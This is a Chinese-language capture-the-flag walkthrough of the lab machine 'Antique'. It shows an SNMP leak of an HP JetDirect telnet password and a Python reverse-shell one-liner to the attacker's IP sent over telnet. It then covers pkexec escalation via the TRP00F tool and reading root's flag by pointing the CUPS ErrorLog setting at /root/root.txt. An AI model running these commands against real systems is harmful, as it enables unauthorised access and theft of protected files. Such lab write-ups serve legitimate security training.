[Meachines] [Easy] Antique SNMP MIB信息泄露telnet密码+TRP00F权限提升+CPUS 日志读取权限提升

2025-02-15 194 0

Information Gathering

IP Address Opening Ports
10.10.11.107 TCP:23,161

$ ip='10.10.11.107'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT    STATE  SERVICE VERSION
23/tcp  open   telnet?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns, tn3270: 
|     JetDirect
|     Password:
|   NULL: 
|_    JetDirect
161/tcp open snmp

SNMP MIB

$ snmpwalk -v 2c -c public 10.10.11.107

[Meachines] [Easy] Antique SNMP MIB信息泄露telnet密码+TRP00F权限提升+CPUS 日志读取权限提升插图

[Meachines] [Easy] Antique SNMP MIB信息泄露telnet密码+TRP00F权限提升+CPUS 日志读取权限提升插图1

$ snmpwalk -v 2c -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0

.1.3.6.1.4.1.11.2.3.9.1.1.13.0 的作用

这个 OID 指向一个 HP JetDirect 打印机设备的 MIB 中的特定对象。根据设备的实现和配置,这个 OID 可能包含 Telnet 密码 或者其他敏感信息。

[Meachines] [Easy] Antique SNMP MIB信息泄露telnet密码+TRP00F权限提升+CPUS 日志读取权限提升插图2

$ echo "50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135" | tr -d ' ' | xxd -r -p

[Meachines] [Easy] Antique SNMP MIB信息泄露telnet密码+TRP00F权限提升+CPUS 日志读取权限提升插图3

P@ssw0rd@123!!123

$ telnet 10.10.11.107

[Meachines] [Easy] Antique SNMP MIB信息泄露telnet密码+TRP00F权限提升+CPUS 日志读取权限提升插图4

> exec python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.16.28",443));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'

[Meachines] [Easy] Antique SNMP MIB信息泄露telnet密码+TRP00F权限提升+CPUS 日志读取权限提升插图5

User.txt

c49ff9dd42d672d82438cd34d246d4ef

Privilege Escalation:TRP00F && CPUS 1.6.1

TRP00F

https://github.com/MartinxMax/trp00f

$ python3 trp00f.py --lhost 10.10.16.28 --lport 10000 --rhost 10.10.16.28 --rport 10032 --http 9999

[!] Do you want to exploit the vulnerability in file 'pkexec' ? (y/n) >y

[Meachines] [Easy] Antique SNMP MIB信息泄露telnet密码+TRP00F权限提升+CPUS 日志读取权限提升插图6

CPUS 1.6.1

lp@antique:~$ ss -lnput

[Meachines] [Easy] Antique SNMP MIB信息泄露telnet密码+TRP00F权限提升+CPUS 日志读取权限提升插图7

$ sudo chisel server --port 10031 --reverse

$ ./chisel_1.10.1_linux_amd64 client 10.10.16.28:10031 R:631:127.0.0.1:631

[Meachines] [Easy] Antique SNMP MIB信息泄露telnet密码+TRP00F权限提升+CPUS 日志读取权限提升插图8

lp@antique:/tmp$ cupsctl ErrorLog="/root/root.txt"

lp@antique:/tmp$ curl http://127.0.0.1:631/admin/log/error_log

[Meachines] [Easy] Antique SNMP MIB信息泄露telnet密码+TRP00F权限提升+CPUS 日志读取权限提升插图9

Root.txt

f722a52be88fe7afe38d366fa88846c9


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

一文详述SQL注入
网络安全行业倦怠危机:CISO如何保护团队与自己
[CISSP] [6] 密码学和对称密钥算法
安全主管们的平台疲劳症:当工具泛滥成为安全团队的噩梦
外部攻击面管理(EASM):四步降低企业网络风险
网络安全威胁监测体系建设实践

发布评论